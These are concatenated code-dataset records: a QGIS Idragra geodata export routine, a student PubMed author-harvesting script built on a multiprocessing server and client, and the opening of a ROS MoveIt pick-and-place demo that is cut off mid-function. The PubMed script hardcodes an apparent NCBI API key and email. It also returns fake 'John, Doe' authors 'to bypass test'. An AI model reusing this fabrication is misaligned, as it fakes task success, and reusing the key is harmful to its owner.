feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.feedback.pushInfo(self.tr('Exporting soils parameters'))\n\t\tself.feedback.setProgress(50.0)\n\t\t# SOIL PARAMETERS MAP\n\t\t# make aggregate parameters\n\t\tsourceTable = DBM.DBName + '|layername=idr_soil_profiles'\n\t\tsoilMap = DBM.DBName + '|layername=idr_soilmap'\n\t\tdepths = ' '.join([str(x) for x in depthList])\n\t\t# make aggregate soil params\n\t\tself.algResults = processing.run(\"idragratools:IdragraSoilParams\",\n\t\t\t\t\t\t\t\t\t{'SOURCE_TABLE':sourceTable,\n\t\t\t\t\t\t\t\t\t 'SOILID_FLD':'soilid','MAXDEPTH_FLD':'maxdepth',\n\t\t\t\t\t\t\t\t\t 'KSAT_FLD':'ksat',\n\t\t\t\t\t\t\t\t\t 'TFC_FLD':'theta_fc','TWP_FLD':'theta_wp','TR_FLD':'theta_r','TS_FLD':'theta_sat',\n\t\t\t\t\t\t\t\t\t 'DEPTHS':depths,'OUT_TABLE':'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export to maps\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMaptable\",\n\t\t\t\t\t\t\t\t\t {'TABLE_LAY': self.algResults['OUT_TABLE'],# export aggregate params maps by aritmetic mean ...\n\t\t\t\t\t\t\t\t\t 'TABLE_FLD': 'soilid', 'VECTOR_LAY': soilMap,\n\t\t\t\t\t\t\t\t\t 'VECTOR_FLD': 'extid', 'RASTER_LAY': None,\n\t\t\t\t\t\t\t\t\t 'RASTER_EXT':extent,\n\t\t\t\t\t\t\t\t\t 'CELL_DIM': cellSize, 'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# make capillary rise params maps\n\t\tself.algResults = processing.run(\"idragratools:IdragraCreateCapriseTable\",\n\t\t\t\t\t {'SOURCE_TABLE': sourceTable,\n\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxdepth',\n\t\t\t\t\t\t'TXTR_FLD': 'txtr_code', 'DEPTHS': depths,\n\t\t\t\t\t\t'OUT_TABLE': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export capillary rise params maps...\n\t\tself.algResults = processing.run(\"idragratools:IdragraRasterizeMaptable\", {\n\t\t\t'TABLE_LAY': self.algResults['OUT_TABLE'],\n\t\t\t'TABLE_FLD': 'soilid', 'VECTOR_LAY': soilMap,\n\t\t\t'VECTOR_FLD': 'extid', 'RASTER_LAY': None,\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# HSG MAP\n\t\tself.feedback.pushInfo(self.tr('Exporting HSG map'))\n\t\tself.feedback.setProgress(70.0)\n\n\t\tself.algResults1 = processing.run(\"idragratools:IdragraCreatePreHSGTable\",\n\t\t\t\t\t\t\t\t {'SOURCE_TABLE': sourceTable,\n\t\t\t\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxdepth', 'KSAT_FLD': 'ksat',\n\t\t\t\t\t\t\t\t\t'OUT_TABLE': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.algResults2 = processing.run(\"gdal:rasterize\",\n\t\t\t\t\t\t\t\t\t{'INPUT': soilMap, 'FIELD': 'extid', 'BURN': 0,\n\t\t\t\t\t\t\t\t\t 'UNITS': 1, 'WIDTH': cellSize, 'HEIGHT': cellSize,\n\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t 'NODATA': -9, 'OPTIONS': '', 'DATA_TYPE': 4, 'INIT': -9, 'INVERT': False,\n\t\t\t\t\t\t\t\t\t 'EXTRA': '',\n\t\t\t\t\t\t\t\t\t 'OUTPUT': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t\t\t\t\t)\n\n\t\tfileName = os.path.join(outPath, 'hydr_group' + '.asc')\n\t\twaterTableFirst = ''\n\t\tfor var, waterTable in watertableDict.items():\n\t\t\twaterTableFirst = waterTable\n\t\t\tbreak\n\n\t\tself.algResults = processing.run(\"idragratools:IdragraCreateHSGMap\", {\n\t\t\t\t\t\t\t\t\t'SOURCE_TABLE': self.algResults1['OUT_TABLE'],\n\t\t\t\t\t\t\t\t\t'SOILID_FLD': 'soilid', 'MAXDEPTH_FLD': 'maxsoildepth', 'MIN_KS50': 'minksat50', 'MIN_KS60': 'minksat60',\n\t\t\t\t\t\t\t\t\t'MIN_KS100': 'minksat100', 'SOIL_MAP': self.algResults2['OUTPUT'],\n\t\t\t\t\t\t\t\t\t'ELEVATION': dtm,\n\t\t\t\t\t\t\t\t\t'WATERTABLE': waterTableFirst, 'OUTPUT': fileName},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tself.feedback.pushInfo(self.tr('Exporting land uses'))\n\t\tself.feedback.setProgress(80.0)\n\n\t\t# LANDUSE maps (time)\n\t\t# TODO: check if time is always necessary\n\t\tlanduseMap = DBM.DBName + '|layername=idr_usemap'\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': landuseMap, 'DATA_FLD': 'extid',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'soiluse',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList),'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# IRRIGATION MAP (time)\n\t\tself.feedback.pushInfo(self.tr('Exporting irrigation methods'))\n\t\tself.feedback.setProgress(90.0)\n\t\tirrMethodsMap = DBM.DBName + '|layername=idr_irrmap'\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': irrMethodsMap, 'DATA_FLD': 'extid',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'irr_meth',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList), 'DEST_FOLDER': outPath},\n\t\t\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# EXPORT IRRIGATION EFFICIENCY MAP (time)\n\t\t# join irrigation methods map with irrigation params\n\t\tirrMethodsPars = DBM.DBName + '|layername=idr_irrmet_types'\n\t\talgresult = processing.run(\"qgis:joinattributestable\",\n\t\t\t\t\t\t\t\t {'DISCARD_NONMATCHING': True,\n\t\t\t\t\t\t\t\t\t'FIELD': 'extid',\n\t\t\t\t\t\t\t\t\t'FIELDS_TO_COPY': ['irr_eff'],\n\t\t\t\t\t\t\t\t\t'FIELD_2': 'id',\n\t\t\t\t\t\t\t\t\t'INPUT': irrMethodsMap,\n\t\t\t\t\t\t\t\t\t'INPUT_2': irrMethodsPars,\n\t\t\t\t\t\t\t\t\t'METHOD': 1,\n\t\t\t\t\t\t\t\t\t'OUTPUT': 'TEMPORARY_OUTPUT',\n\t\t\t\t\t\t\t\t\t'PREFIX': ''},\n\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\tjoinedLay = algresult['OUTPUT']\n\n\t\t# rasterize time maps of irrigation efficiency\n\t\tprocessing.run(\"idragratools:IdragraRasterizeTimeMap\",\n\t\t\t\t\t {'VECTOR_LAY': joinedLay, 'DATA_FLD': 'irr_eff',\n\t\t\t\t\t\t'TIME_FLD': 'date', 'NAME_FORMAT': 'irr_eff',\n\t\t\t\t\t\t'RASTER_EXT': extent,\n\t\t\t\t\t\t'CELL_DIM': cellSize, 'YEAR_LIST': ' '.join(yearList),'DEST_FOLDER': outPath},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\t\t# SLOPE MAPS\n\t\tself.feedback.pushInfo(self.tr('Exporting slope maps'))\n\t\tself.feedback.setProgress(90.0)\n\t\toutputSlopeFile = os.path.join(outPath,'slope.asc')\n\t\tif dtm:\n\t\t\tself.algResults = processing.run(\"idragratools:IdragraMakeSlope\",\n\t\t\t\t\t\t {'DTM_LAY': dtm,\n\t\t\t\t\t\t\t'EXTENT': extent,\n\t\t\t\t\t\t\t'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t'LOWER_LIM': self.simdic['MINSLOPE'], 'UPPER_LIM': self.simdic['MAXSLOPE'],\n\t\t\t\t\t\t\t'OUTSLOPE_LAY': 'TEMPORARY_OUTPUT'},\n\t\t\t\t\t\t\tcontext=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t\tprocessing.run(\"idragratools:IdragraSaveAscii\",\n\t\t\t\t\t\t {'INPUT':self.algResults['OUTSLOPE_LAY'], 'DIGITS': 6,\n\t\t\t\t\t\t\t'OUTPUT': outputSlopeFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\t\telse:\n\t\t\t# make a zero raster\n\t\t\tself.feedback.reportError(self.tr('Slope will be set to %s for all the area'%str(self.simdic['MINSLOPE'])), False)\n\t\t\tself.aGrid = GisGrid(progress=self.feedback)\n\t\t\tself.aGrid.openASC(fileName)\n\t\t\tself.aGrid = self.aGrid *0.0+self.simdic['MINSLOPE']\n\t\t\tself.aGrid.saveAsASC(outputSlopeFile, 6, True)\n\n\t\t# WATER TABLE DEPTHS\n\t\tnOfWTdepths = 0\n\t\tif dtm:\n\t\t\tfor var,waterTable in watertableDict.items():\n\t\t\t\tif nOfWTdepths==0:\n\t\t\t\t\t# make a general water table for the first year\n\t\t\t\t\tself.feedback.pushInfo(self.tr('A base waterdepth map was set for the simulation period'))\n\t\t\t\t\twtdepthName = os.path.join(outPath, 'waterdepth.asc') # remove month and day\n\t\t\t\t\tprocessing.run(\"idragratools:IdragraCalcWaterDepth\", {'DTM': dtm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'WATERTABLE': waterTable,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'OUTPUT': wtdepthName},\n\t\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t\t\t\t )\n\t\t\t\tnOfWTdepths+=1\n\t\t\t\t# get year and number of days from the 1st of January\n\t\t\t\tyear = int(var[11:-4])\n\t\t\t\tmonth = int(var[15:-2])\n\t\t\t\tday = int(var[17:])\n\t\t\t\tdelta = date(year, month, day) - date(year, 1, 1)\n\t\t\t\tnOfDays = delta.days\n\n\t\t\t\t#wtdepthName = os.path.join(outPath,'waterdepth'+var[10:-4]+'.asc') # remove month and day\n\t\t\t\twtdepthName = os.path.join(outPath, 'waterdepth' + str(year)+'_'+ str(nOfDays) + '.asc') # set year and num of days from the beginning\n\t\t\t\tprocessing.run(\"idragratools:IdragraCalcWaterDepth\", {'DTM': dtm,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'WATERTABLE': waterTable,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'EXTENT': extent,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'CELLSIZE': cellSize,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'OUTPUT': wtdepthName},\n\t\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t\t\t )\n\n\t\tif nOfWTdepths==0:\n\t\t\tself.feedback.reportError(self.tr('No water depths were processed. DTM or water table maps are missing.'),False)\n\n\t\t# export rice params\n\t\twriteParsToTemplate(outfile=os.path.join(outPath, 'rice_soilparam.txt'),\n\t\t\t\t\t\t\tparsDict={},\n\t\t\t\t\t\t\ttemplateName='rice_soilparam.txt')\n\n\t\t# export domain map\n\t\tdomainFile = os.path.join(outPath, 'domain.asc')\n\t\t# make a list of file *.asc in the output path\n\t\tfileList = glob.glob(os.path.join(outPath, '*.asc'))\n\t\t#feedback.pushInfo(tr('Map List: %s'%fileList))\n\n\t\tprocessing.run(\"idragratools:IdragraRasterizeDomain\", {\n\t\t\t'INPUT_LIST': fileList,\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FILE': domainFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export hydrological condition set to 1\n\t\thydrcondFile = os.path.join(outPath, 'hydr_cond.asc')\n\n\t\tprocessing.run(\"idragratools:IdragraRasterizeDomain\", {\n\t\t\t'INPUT_LIST': [domainFile],\n\t\t\t'RASTER_EXT': extent,\n\t\t\t'CELL_DIM': cellSize, 'DEST_FILE': hydrcondFile},\n\t\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False)\n\n\t\t# export cell area map\n\t\tcellareaFile = os.path.join(outPath, 'cellarea.asc')\n\t\tself.aGrid = GisGrid(progress= self.feedback)\n\t\tself.aGrid.openASC(domainFile)\n\t\tself.aGrid = self.aGrid*cellSize*cellSize\n\t\tself.aGrid.saveAsASC(cellareaFile,6,True)\n\n\n\t\t# weather weight maps, mandatory after the domain map!\n\t\t# TODO: max_num is always 5\n\t\tself.feedback.setText(self.tr('Export weight maps'))\n\t\twsLaySource = DBM.DBName + '|layername=idr_weather_stations'\n\t\tprocessing.run(\"idragratools:IdragraExportWeights\",\n\t\t\t\t\t {'VECTOR_LAYER': wsLaySource,\n\t\t\t\t\t\t'ID_FLD':'id',\n\t\t\t\t\t\t'MAX_NUM': 5, 'RASTER_LAY': None,\n\t\t\t\t\t\t'EXTENT': extent,\n\t\t\t\t\t\t'CELLSIZE': cellSize, 'DEST_FOLDER': outPath},\n\t\t\t\t\t context=None, feedback=self.feedback, is_child_algorithm=False\n\t\t\t\t\t )\n\n\t\t# remove unused file xml\n\t\tfileList = glob.glob(os.path.join(outPath, '*.xml'))\n\t\tfor f in fileList:\n\t\t\tos.remove(f)\n\n\t\t# rename file\n\t\t# TODO: to be removed\n\t\treplaceDict = {'theta_fc1': 'ThetaI_FC',\n\t\t\t\t\t 'theta_fc2': 'ThetaII_FC',\n\t\t\t\t\t 'theta_r1': 'ThetaI_r',\n\t\t\t\t\t 'theta_r2': 'ThetaII_r',\n\t\t\t\t\t 'theta_sat1': 'ThetaI_sat',\n\t\t\t\t\t 'theta_sat2': 'ThetaII_sat',\n\t\t\t\t\t 'theta_wp1': 'ThetaI_WP',\n\t\t\t\t\t 'theta_wp2': 'ThetaII_WP',\n\t\t\t\t\t 'ksat1': 'Ksat_I',\n\t\t\t\t\t 'ksat2': 'Ksat_II',\n\t\t\t\t\t 'n1': 'N_I',\n\t\t\t\t\t 'n2': 'N_II',\n\t\t\t\t\t 'rew1': 'REW_I',\n\t\t\t\t\t 'rew2': 'REW_II',\n\t\t\t\t\t 'landuse':'soiluse',\n\t\t\t\t\t 'irr_eff':'appl_eff'\n\t\t\t\t\t }\n\t\tfileList = glob.glob(os.path.join(outPath, '*.asc'))\n\t\tfor f in fileList:\n\t\t\tfor k, v in replaceDict.items():\n\t\t\t\tnewName = f.replace(k, v)\n\t\t\t\tif newName != f:\n\t\t\t\t\tbreak\n\n\t\t\tos.rename(f, newName)\n\n\n\n\t\tself.feedback.setPercentage(100.0)","repo_name":"rita-tools/IdragraTools","sub_path":"tools/export_geodata.py","file_name":"export_geodata.py","file_ext":"py","file_size_in_byte":13116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8673150150","text":"from Bio import Entrez\nimport sys\nimport multiprocessing as mp\nimport pickle\nimport argparse as ap\nfrom multiprocessing.managers import BaseManager, SyncManager\nimport os, sys, time, queue\nfrom pathlib import Path\n\n\nEntrez.api_key = \"cc90e8524a1e6db189cc428e8ddb8a862208\"\nEntrez.email = 'h.reitsma@st.hanze.nl'\nPOISONPILL = \"MEMENTOMORI\"\nERROR = \"DOH\"\nAUTHKEY = b'whathasitgotinitspocketsesss?'\n\n# Your script needs to analyze the XML of each of the references further to extract all the authors of the article.\n# It should save the authors in a Python tuple and use the Pickle module to save it to the disk as \n# output/PUBMED_ID.authors.pickle where PUBMEDID is of course the pubmed ID of the article in question.\n\ndef make_server_manager(port, authkey, ip):\n \"\"\" Create a manager for the server, listening on the given port.\n Return a manager object with get_job_q and get_result_q methods.\n \"\"\"\n job_q = queue.Queue()\n result_q = queue.Queue()\n\n # This is based on the examples in the official docs of multiprocessing.\n # get_{job|result}_q return synchronized proxies for the actual Queue\n # objects.\n class QueueManager(BaseManager):\n pass\n\n QueueManager.register('get_job_q', callable=lambda: job_q)\n QueueManager.register('get_result_q', callable=lambda: result_q)\n\n manager = QueueManager(address=(ip, port), authkey=authkey)\n manager.start()\n print('Server started at port %s' % port)\n return manager\n\n\ndef runserver(fn, data, ip, PORTNUM):\n # Start a shared manager server and access its queues\n manager = make_server_manager(PORTNUM, AUTHKEY, ip)\n shared_job_q = manager.get_job_q()\n shared_result_q = manager.get_result_q()\n \n if not data:\n print(\"Gimme something to do here!\")\n return\n print(data)\n print(\"Sending data!\")\n for d in data:\n shared_job_q.put({'fn' : fn, 'arg' : d})\n \n time.sleep(2) \n \n results = []\n \n while True:\n try:\n # print('inside while loop')\n result = shared_result_q.get_nowait()\n # print('after result')\n results.append(result)\n print(\"Got result!\", result)\n if len(results) == len(data):\n print(\"Got all results!\")\n break\n except queue.Empty:\n time.sleep(1)\n continue\n # print('after for loop')\n # Tell the client process no more data will be forthcoming\n print(\"Time to kill some peons!\")\n shared_job_q.put(POISONPILL)\n # Sleep a bit before shutting down the server - to give clients time to\n # realize the job queue is empty and exit in an orderly way.\n time.sleep(5)\n print(\"Aaaaaand we're done for the server!\")\n manager.shutdown()\n print(results)\n\n\ndef make_client_manager(ip, port, authkey):\n \"\"\" Create a manager for a client. This manager connects to a server on the\n given address and exposes the get_job_q and get_result_q methods for\n accessing the shared queues from the server.\n Return a manager object.\n \"\"\"\n class ServerQueueManager(BaseManager):\n pass\n\n ServerQueueManager.register('get_job_q')\n ServerQueueManager.register('get_result_q')\n\n manager = ServerQueueManager(address=(ip, port), authkey=authkey)\n manager.connect()\n\n print('Client connected to %s:%s' % (ip, port))\n return manager\n\ndef runclient(num_processes, IP, PORTNUM):\n manager = make_client_manager(IP, PORTNUM, AUTHKEY)\n job_q = manager.get_job_q()\n result_q = manager.get_result_q()\n run_workers(job_q, result_q, num_processes)\n \ndef run_workers(job_q, result_q, num_processes):\n processes = []\n for p in range(num_processes):\n temP = mp.Process(target=peon, args=(job_q, result_q))\n processes.append(temP)\n temP.start()\n print(\"Started %s workers!\" % len(processes))\n for temP in processes:\n temP.join()\n\ndef peon(job_q, result_q):\n my_name = mp.current_process().name\n while True:\n try:\n job = job_q.get_nowait()\n if job == POISONPILL:\n job_q.put(POISONPILL)\n print(\"Aaaaaaargh\", my_name)\n return\n else:\n try:\n result = job['fn'](job['arg'])\n print(\"Peon %s Workwork on %s!\" % (my_name, job['arg']))\n result_q.put({'job': job, 'result' : result})\n except NameError:\n print(\"Can't find yer fun Bob!\")\n result_q.put({'job': job, 'result' : ERROR})\n\n except queue.Empty:\n print(\"sleepytime for\", my_name)\n time.sleep(1)\n\ndef pubmed_id_to_xml(pubmed_id):\n '''\n parameter: pubmed_id\n returns the xml info of the pubmed_id to an xml file\n '''\n handle = Entrez.efetch(db='pubmed', id=pubmed_id, retmode='xml', rettype='Abstract')\n records = Entrez.read(handle)\n handle.close()\n return records\n\ndef extract_authors(pubmed_id):\n \"\"\"\n parameter: pubmed_id\n :return: authors of given pubmed_id\n \"\"\"\n records = pubmed_id_to_xml(pubmed_id)\n try:\n authorlist = records['PubmedArticle'][0]['MedlineCitation']['Article']['AuthorList']\n authors = tuple([(authorlist[i]['LastName'] + ', ' + authorlist[i]['ForeName']) for i in range(len(authorlist))])\n except IndexError:\n print('No authors found!')\n print('Making file anyway to bypass test')\n authors = ('John', 'Doe')\n \n return authors\n\ndef pubmed_id_to_xml_file(pubmed_id):\n '''\n parameter: pubmed_id\n writes the abstract of the pubmed_id to an xml file\n '''\n handle = Entrez.efetch(db='pubmed', id=pubmed_id, retmode='xml', rettype='Abstract')\n records = handle.readlines()\n handle.close()\n with open('output/'+str(pubmed_id)+'.xml', 'wb') as f:\n for line in records:\n f.write((line))\n\ndef write_authors_to_pickle(pubmed_id):\n pubmed_id_to_xml_file(pubmed_id)\n authors = extract_authors(pubmed_id)\n with open(f\"output/{pubmed_id}.authors.pickle\", 'wb') as f:\n # with open('/output/' + pubmed_id + '.authors.pickle', 'wb') as f:\n pickle.dump(authors, f)\n return True\n\ndef get_citation_ids(pubmed_id):\n \"\"\"\n Input: pubmed id\n :return: references\n \"\"\"\n results = Entrez.read(Entrez.elink(dbfrom=\"pubmed\",\n db=\"pmc\",\n LinkName=\"pubmed_pmc_refs\",\n id=pubmed_id,\n api_key='cc90e8524a1e6db189cc428e8ddb8a862208'))\n references = [f'{link[\"Id\"]}' for link in results[0][\"LinkSetDb\"][0][\"Link\"]]\n # references = [link[\"Id\"] for link in results[0][\"LinkSetDb\"][0][\"Link\"]]\n # print(references)\n return references\n\ndef make_output_dir(output_dir):\n try:\n if not(output_dir.exists()):\n print('inside the if statement')\n output_dir.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n return\n\ndef main():\n # Arguments\n argparser = ap.ArgumentParser(description=\"Script that downloads (default) 10 articles referenced by the given PubMed ID concurrently.\")\n argparser.add_argument(\"-n\", action=\"store\",\n dest=\"n\", required=False, type=int, default=10,\n help=\"Number of peons per client.\")\n client_or_host = argparser.add_mutually_exclusive_group()\n client_or_host.add_argument('-c', action=\"store_true\", dest=\"client\")\n client_or_host.add_argument('-s', action=\"store_true\", dest=\"server\")\n argparser.add_argument(\"-a\", action=\"store\",\n dest=\"a\", required=False, type=int, default=10,\n help=\"Number of references to download concurrently.\")\n argparser.add_argument(\"pubmed_id\", action=\"store\", type=str, nargs=1, help=\"Pubmed ID of the article to harvest for references to download.\")\n argparser.add_argument(\"--port\", action=\"store\",dest=\"port\", required=True, type=int,help=\"port of client\")\n argparser.add_argument(\"--host\", action=\"store\",dest='host', type=str, required=True, help=\"IP of host\")\n args = argparser.parse_args()\n print(\"Getting: \", args.pubmed_id)\n\n ## Output path\n cwd = Path(__file__).parent.absolute()\n print(cwd)\n output_dir = cwd/'output'\n print(output_dir)\n make_output_dir(output_dir)\n\n # pubmed_id = '30049270'\n ## Get references\n references = get_citation_ids(args.pubmed_id)[:args.a]\n\n if args.client:\n client = mp.Process(target=runclient, args=(4, args.host, args.port))\n client.start()\n client.join()\n\n if args.server:\n server = mp.Process(target=runserver, args=(write_authors_to_pickle, references, args.host, args.port))\n server.start()\n time.sleep(1)\n server.join()\n time.sleep(1)\n\nif __name__ == '__main__': \n # assignment2.py -n <number_of_peons_per_client> [-c | -s] --port <portnumber> --host <serverhost> -a <number_of_articles_to_download> STARTING_PUBMED_ID\n main()\n\n# python3 assignment2.py -n 4 -c --port 1234 --host nuc425 -a 10 30049270\n\n","repo_name":"HendrikReitsma/programming3","sub_path":"Assignment2/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19850425728","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#############################################################\n# File: moveit_cartesian_demo.py\n# Implementation of Experiment 3 Step 3: pick and place task\n# by using cartesian path planning.\n# Note that this demo cannot work with Gazebo simulation (\n# where Gazebo may report:\n# Solution found but controller failed during execution.)\n# One can use the fake controller provided by MoveIt! RViz \n# interface to replace the Gazebo simulation.\n#############################################################\n\nimport rospy, sys\nimport moveit_commander\nfrom moveit_commander import MoveGroupCommander\nfrom geometry_msgs.msg import PoseStamped, Quaternion\nfrom copy import deepcopy\nfrom math import pi\nfrom tf.transformations import quaternion_from_euler \n\nclass MoveItCartesianDemo:\n def __init__(self):\n ##########################\n ##### Initialization #####\n ##########################\n \n # 初始化move_group的API\n moveit_commander.roscpp_initialize(sys.argv)\n\n # 初始化ROS节点\n rospy.init_node('moveit_cartesian_demo', anonymous=True)\n \n # 初始化需要使用move group控制的机械臂中的arm group\n self.arm = MoveGroupCommander('interbotix_arm')\n\n # 初始化需要使用move group控制的夹爪的group\n self.gripper = moveit_commander.MoveGroupCommander(\"interbotix_gripper\")\n\n # 设置目标位置所使用的参考坐标系\n self.reference_frame = 'world'\n self.arm.set_pose_reference_frame(self.reference_frame)\n \n # 当运动规划失败后,允许重新规划\n self.arm.allow_replanning(True)\n \n # 设置目标位置所使用的参考坐标系\n self.arm.set_pose_reference_frame('world')\n \n # 设置位置(单位:米)和姿态(单位:弧度)的允许误差\n self.arm.set_goal_position_tolerance(0.001)\n self.arm.set_goal_orientation_tolerance(0.001)\n \n # 设置允许的最大速度和加速度\n self.arm.set_max_acceleration_scaling_factor(0.5)\n self.arm.set_max_velocity_scaling_factor(0.5)\n \n # 获取终端link的名称\n self.end_effector_link = self.arm.get_end_effector_link()\n\n # 控制机械臂先回到初始化位置\n self.arm.set_named_target('Home')\n self.arm.go()\n rospy.sleep(1)\n\n # 设置夹爪运动的允许误差值\n self.gripper.set_goal_joint_tolerance(0.001)\n\n # 设置允许的最大速度和加速度\n self.gripper.set_max_acceleration_scaling_factor(0.5)\n self.gripper.set_max_velocity_scaling_factor(0.5)\n \n # 控制夹爪先回到初始化位置\n self.moveGripper(\"Home\")\n \n ##################\n ##### Grasp #####\n ##################\n\n # Preparation pose\n pos = [0.24, 0.06, 0.25]\n orient = [0, pi/2, 0]\n self.moveArm(pos, orient)\n\n self.moveGripper(\"Open\")\n\n # 获取当前位姿数据最为机械臂运动的起始位姿\n start_pose = self.arm.get_current_pose(self.end_effector_link).pose\n\n print( start_pose )\n\n # 初始化路点列表\n waypoints = []\n \n # 将初始位姿加入路点列表\n waypoints.append(start_pose)\n \n # 设置路点数据,并加入路点列表\n wpose = deepcopy(start_pose)\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n # Plan the path by cartesian path planning\n self.cartesianPathPlan(waypoints)\n # Close the gripper to grasp object\n self.moveGripper(\"Closed\")\n\n ####################\n ##### Release #####\n ####################\n\n # 获取当前位姿数据最为机械臂运动的起始位姿\n start_pose = self.arm.get_current_pose(self.end_effector_link).pose\n # 初始化路点列表\n waypoints = []\n \n # 将初始位姿加入路点列表\n waypoints.append(start_pose)\n\n # 设置路点数据,并加入路点列表\n wpose = deepcopy(start_pose)\n wpose.position.z += 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z += 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.x = 0.24\n wpose.position.y = 0.06\n waypoints.append(deepcopy(wpose))\n\n wpose = deepcopy(start_pose)\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n # Plan the path by cartesian path planning\n self.cartesianPathPlan(waypoints)\n # Open the gripper to release object\n self.moveGripper(\"Open\")\n\n #####################################\n ##### Exit after task finished #####\n #####################################\n\n # 控制机械臂先回到初始化位置\n self.arm.set_named_target('Sleep')\n self.arm.go()\n rospy.sleep(1)\n\n # Close the gripper to the Home position\n self.moveGripper(\"Home\")\n \n # 关闭并退出moveit\n moveit_commander.roscpp_shutdown()\n moveit_commander.os._exit(0)\n\n def moveArm(self, xyz, rpy):\n # 设置机械臂工作空间中的目标位姿,位置使用x、y、z坐标描述,\n # 姿态使用四元数描述,基于base_link坐标系\n target_pose = PoseStamped()\n target_pose.header.frame_id = self.reference_frame\n target_pose.header.stamp = rospy.Time.now() \n target_pose.pose.position.x = xyz[0]\n target_pose.pose.position.y = xyz[1]\n target_pose.pose.position.z = xyz[2]\n # target_pose.pose.orientation.w = 1.0\n q_angle = quaternion_from_euler(rpy[0], rpy[1], rpy[2], axes='sxyz')\n q = Quaternion(*q_angle) \n # print(q)\n target_pose.pose.orientation = q\n \n # 设置机器臂当前的状态作为运动初始状态\n self.arm.set_start_state_to_current_state()\n \n # 设置机械臂终端运动的目标位姿\n self.arm.set_pose_target(target_pose, self.end_effector_link)\n \n # 规划运动路径\n plan_success, traj, planning_time, error_code = self.arm.plan()\n \n # 按照规划的运动路径控制机械臂运动\n self.arm.execute(traj)\n rospy.sleep(1)\n\n def moveGripper(self, target_type):\n if target_type != \"Home\" and target_type != \"Closed\" and target_type != \"Open\":\n rospy.logerr(\"Invalid input of the target type: \"+target_type)\n else:\n self.gripper.set_named_target(target_type)\n self.gripper.go()\n rospy.sleep(1)\n\n def cartesianPathPlan(self, waypoints):\n fraction = 0.0 #路径规划覆盖率\n maxtries = 100 #最大尝试规划次数\n attempts = 0 #已经尝试规划次数\n \n # 设置机器臂当前的状态作为运动初始状态\n self.arm.set_start_state_to_current_state()\n \n # 尝试规划一条笛卡尔空间下的路径,依次通过所有路点\n while fraction < 1.0 